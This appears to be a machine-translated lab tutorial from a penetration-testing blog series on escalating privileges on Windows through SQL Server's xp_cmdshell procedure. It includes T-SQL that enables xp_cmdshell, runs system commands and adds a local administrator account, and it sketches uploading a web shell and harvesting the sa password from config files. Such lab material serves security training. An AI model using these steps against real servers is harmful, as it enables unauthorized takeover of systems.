当前位置:网站首页>110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]
110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]
2022-07-07 11:56:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows Sqlserver xp_cmdshell Stored procedure Authorization
1、XP_CMDSHELL Background of power raising :
If the database used in the website is sqlserver So if you find sa Password , Can be opened xp_cmdshell stored procedure , With sqlserver Execute system commands as . But not necessarily the system permissions , It also depends on the administrator installing at the beginning sqlserver Permission settings for .
2、XP_CMDSHELL Relevant concepts :
(1)xp_cmdshell stored procedure 【 The stored procedure is : One or more that have been precompiled into an executable procedure SQL Collection of statements 】, It is used to execute this machine cmd Ordered , System login required sa jurisdiction . By default ,sql server2005/2008 After installation ,xp_cmdshell Stored procedures are disabled , If you want to use it , You can turn on :
Exec sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;`
Serial number | command | notes |
---|---|---|
1 | Exec sp_configure ‘show advanced options’,1; | # Allow configuration of advanced options |
2 | RECONFIGURE; | # Reconfiguration |
3 | EXEC sp_configure ‘xp_cmdshell’,1; | # Enable xp_cmdshell stored procedure |
4 | RECONFIGURE; | # Reconfiguration |
(2) Execute system command format :
Serial number | command | notes |
---|---|---|
1 | Exec master.dbo.xp_cmdshell ‘whoami’ | # View the current user |
2 | Exec master.dbo.xp_cmdshell ‘net user’ | # View all users |
3 | Exec master.dbo.xp_cmdshell ‘systeminfo’ | # see OS Information |
4 | Exec master.dbo.xp_cmdshell ‘net user test 123 /add & net localgroup administrators test /add’ | # Add administrator group user |
(3) Disable it after use :Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
Serial number | command | notes |
---|---|---|
1 | Exec sp_configure ‘show advanced options’,1; | # Allow configuration of advanced options |
2 | RECONFIGURE; | # Reconfiguration |
3 | EXEC sp_configure ‘xp_cmdshell’,0; | # Ban xp_cmdshell stored procedure |
4 | RECONFIGURE; | # Reconfiguration |
3、XP_CMDSHELL The actual battle of raising power :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment :php/asp The language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(3) Target link :
URL:http://target_sys.com/upload.php
(3) Experimental process :
First step : Visit the target link , utilize MIME Break through the type limit of the white list , Upload up.aspx Malaysia
【 The above process is a little 】 The following is the right raising process :
The second step : Connect up.aspx Malaysia 【 The password for admin】, And click [File Manager] File management module , Search for sqlserver The account number and password of
Connecting Malaysia :
sqlserver The general storage location of the connection data :web.config、config.asp、conn.aspx、database.aspx, But the environment is really sidelined (www.demo1.com) Under the index.aspx Memory stores as User password :123456
The third step : Click on [DataBase] Database module , Use the just obtained sa Account connection mssql, Simultaneous discovery SQL SERVER Version is 2008
xp_cmdshell Stored procedures are used to execute native cmd Ordered , System login required sa jurisdiction
Step four :SQLExec Select from the drop-down box Add xp_cmdshell(SQL2005) This option , Turn on xp_cmdshell stored procedure
Step five : Use the just launched xp_cmdshell stored procedure , With sqlserver To execute some system commands as
Because viewing the current permission is also an ordinary user , So you can only execute some basic commands , You can also upload the overflow right lifting tool Then improve the permissions of the current user .
边栏推荐
- 【紋理特征提取】基於matlab局部二值模式LBP圖像紋理特征提取【含Matlab源碼 1931期】
- In my limited software testing experience, a full-time summary of automation testing experience
- HCIA复习整理
- Camera calibration (2): summary of monocular camera calibration
- 正在运行的Kubernetes集群想要调整Pod的网段地址
- Mise en œuvre du codage Huffman et du décodage avec interface graphique par MATLAB
- NPC Jincang was invited to participate in the "aerospace 706" I have an appointment with aerospace computer "national Partner Conference
- 5V串口接3.3V单片机串口怎么搞?
- 112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权&msf本地提权]
- C#中在路径前加@的作用
猜你喜欢
软件内部的定时炸弹:0-Day Log4Shell只是冰山一角
112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权&msf本地提权]
Summed up 200 Classic machine learning interview questions (with reference answers)
聊聊SOC启动(十一) 内核初始化
Suggestions on one-stop development of testing life
清华姚班程序员,网上征婚被骂?
Programming examples of stm32f1 and stm32subeide -315m super regenerative wireless remote control module drive
聊聊SOC启动(九) 为uboot 添加新的board
Matlab implementation of Huffman coding and decoding with GUI interface
聊聊SOC启动(六)uboot启动流程二
随机推荐
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
正在运行的Kubernetes集群想要调整Pod的网段地址
【滤波跟踪】基于matlab捷联惯导仿真【含Matlab源码 1935期】
Neural approvals to conversational AI (1)
【最短路】ACwing 1127. 香甜的黄油(堆优化的dijsktra或spfa)
【系统设计】指标监控和告警系统
浙江大学周亚金:“又破又立”的顶尖安全学者,好奇心驱动的行动派
Blog moved to Zhihu
[Yugong series] go teaching course 005 variables in July 2022
QT | multiple windows share a prompt box class
The function of adding @ before the path in C #
SwiftUI Swift 内功之 Swift 中使用不透明类型的 5 个技巧
electron 添加 SQLite 数据库
MATLAB實現Huffman編碼譯碼含GUI界面
千人规模互联网公司研发效能成功之路
Present pod information to the container through environment variables
Reasons for the failure of web side automation test
大佬们有没有人遇到过 flink oracle cdc,读取一个没有更新操作的表,隔十几秒就重复读取
【全栈计划 —— 编程语言之C#】基础入门知识一文懂
[texture feature extraction] LBP image texture feature extraction based on MATLAB local binary mode [including Matlab source code 1931]